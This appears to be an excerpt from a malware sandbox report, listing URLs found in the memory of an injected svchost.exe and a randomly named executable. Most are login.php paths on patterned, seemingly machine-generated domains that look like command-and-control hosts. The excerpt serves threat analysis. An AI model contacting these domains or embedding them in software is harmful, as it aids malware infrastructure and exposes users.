Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2651524701.000000000CC15000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523366703.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2612069881.00000000033FB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522994867.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1522877168.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523355053.00000000033D5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1544003881.0000000000892000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyryxij.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyfin.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lysyfyj.com/
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564981200.000000000CC62000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.000000000934D000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 
00000026.00000002.2016739257.0000000007F64000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://lysyfyj.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656485349.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1908769113.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656025861.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysyjex.com/login.php
Source: svchost.exe, 00000002.00000003.1884602556.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649584465.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649362896.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1648516559.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysylun.com/login.php
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1682351904.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930331574.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1684842179.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lysymor.com/login.php
Source: svchost.exe, 00000002.00000003.1475753767.000000000323E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695532230.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywer.com/
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604582055.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469750159.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565084658.000000000CC58000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475947519.0000000003288000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475968169.0000000000861000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498796821.0000000000860000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694688622.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2565184265.0000000003305000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2604235819.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.2651257908.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywer.com/login.php
Source: svchost.exe, 00000002.00000003.1845428150.000000000CC14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxywij.com/
Source: svchost.exe, 00000002.00000003.1912922539.0000000005A34000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1940902998.000000000CC51000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1913918462.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://lyxyxox.com/login.php
Source: svchost.exe, 00000002.00000003.1629387199.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633505230.000000000CC14000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1873623051.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635624725.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632929429.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632501929.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632427360.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633773488.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1632319218.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1629462087.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1633198974.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybop.com/login.php
Source: svchost.exe, 00000002.00000003.1522565965.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1523100959.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743738473.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1529694932.00000000033C6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufybyv.com/login.php
Source: svchost.exe, 00000002.00000003.1685885238.0000000000892000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683417197.000000000088E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1683897508.000000000088E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycog.com/
Source: svchost.exe, 00000002.00000003.1590888077.00000000033DC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1599472059.00000000032EB000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582101693.0000000003303000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590695554.0000000003306000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591289289.0000000003307000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581589159.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1581749957.00000000032FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycol.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658112964.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1636514869.00000000032FF000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1649496281.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1635680234.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufycyq.com/login.php
Source: svchost.exe, 00000002.00000003.2560852053.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2560976455.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2566811374.0000000005A52000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1743797067.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1498514117.0000000003238000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1691114593.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1466997109.000000000335C000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.00000000092BD000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1950020308.0000000009307000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.000000000143B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 
http://pufygug.com/login.php
Source: svchost.exe, 00000002.00000003.1666672208.00000000008F4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662045970.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665001861.00000000008F6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1663533223.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1668142095.00000000033CD000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1664828097.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyjag.com/login.php
Source: svchost.exe, 00000002.00000003.1603267718.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602887745.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1840416294.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603168288.0000000003343000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1603167854.0000000003341000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1602885484.0000000003341000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylap.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656748917.000000000327F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655106952.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1665118368.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655014945.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654557673.000000000327E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1662084195.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufylul.com/login.php
Source: svchost.exe, 00000002.00000003.1694028525.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694837550.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1693477396.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1742037813.0000000005AF7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1698573170.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1694886931.0000000005AF5000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2564597810.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1695615652.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2708774513.000000000CCF3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1469136296.0000000000888000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2594942021.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1736282194.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1688870805.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1475543388.000000000335E000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.000000000127A000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000014.00000002.1882088055.0000000001305000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.1989703593.00000000013D9000.00000004.00000020.00020000.00000000.sdmp, nPtwtzGyOdAtB.exe, 00000026.00000002.2016739257.0000000007FB5000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: 
http://pufymoq.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881589520.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910878374.0000000005AF8000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1881586177.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1879076006.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1910457122.0000000005AF4000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1878812312.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1639589869.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1898508085.00000000033CC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypeg.com/login.php
Source: svchost.exe, 00000002.00000003.1590647626.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2660041223.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590381869.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1938865838.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1590090369.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582128544.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2694910479.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1582064020.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1795234463.0000000005A48000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2693529547.000000000323F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1801491863.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1930763259.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2699480147.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1589646686.00000000033FC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1799048564.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.2696037561.00000000033D7000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2661870675.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1872492908.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1591143916.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 
00000002.00000003.1911176076.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1600938466.00000000033CD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufypiq.com/login.php
Source: svchost.exe, 00000002.00000003.1657307465.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1655091377.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1656077632.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1652924982.0000000003339000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1658856435.0000000003345000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1654531739.0000000003345000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufytip.com/login.php
Source: svchost.exe, 00000002.00000003.1885484259.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1902187697.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903772814.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1900631623.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903194494.0000000005A4A000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1937722708.0000000005A49000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1903551972.0000000005A4A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxov.com/login.php
Source: svchost.exe, 00000002.00000003.1735890542.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2595608903.0000000005A46000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1697918003.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1804173388.000000000CC50000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2084955856.00000000033CC000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1824916487.000000000CC4F000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.2082300647.00000000033C6000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1839980751.000000000CC4F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pufyxyp.com/login.php
